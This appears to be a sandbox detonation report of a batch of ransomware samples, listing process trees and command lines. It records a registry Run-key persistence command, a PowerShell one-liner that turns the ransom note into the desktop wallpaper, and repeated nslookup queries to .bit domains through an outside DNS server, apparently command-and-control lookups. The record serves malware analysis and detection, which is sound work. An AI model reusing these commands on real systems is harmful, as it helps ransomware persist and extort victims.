PID 2176 wrote to memory of 5024 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe C:\Users\Admin\AppData\Roaming\Cntrlphse.exe
PID 2176 wrote to memory of 5024 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe C:\Users\Admin\AppData\Roaming\Cntrlphse.exe
PID 928 wrote to memory of 3940 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 928 wrote to memory of 3940 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 928 wrote to memory of 3940 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 1792 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe
PID 1792 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe
PID 4196 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4196 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1792 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe
PID 1792 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe
PID 1792 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe
PID 1792 wrote to memory of 7188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe
PID 1792 wrote to memory of 7188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe
PID 1792 wrote to memory of 7188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe
PID 2068 wrote to memory of 7352 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 7352 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 7352 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 7188 wrote to memory of 8040 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe C:\Windows\SysWOW64\nslookup.exe
PID 7188 wrote to memory of 8040 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe C:\Windows\SysWOW64\nslookup.exe
PID 7188 wrote to memory of 8040 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe C:\Windows\SysWOW64\nslookup.exe
PID 7352 wrote to memory of 5504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 7352 wrote to memory of 5504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00476.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00476.7z"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe

HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe

HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe

HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe

HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe

HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe

HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe

HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe

HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41~1\mouranth.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""

C:\Users\Admin\AppData\Roaming\Cntrlphse.exe

"C:\Users\Admin\AppData\Roaming\Cntrlphse.exe"

C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe

HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe

HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe

HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1550356177.png /f

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\AppData\ChickiMiki Design.exe

"C:\Users\Admin\AppData\ChickiMiki Design.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\read_it.txt

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00476\GET_YOUR_FILES_BACK.txt

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x120,0x124,0x40,0x128,0x7ffcedc746f8,0x7ffcedc74708,0x7ffcedc74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:8

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3664 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcedc746f8,0x7ffcedc74708,0x7ffcedc74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

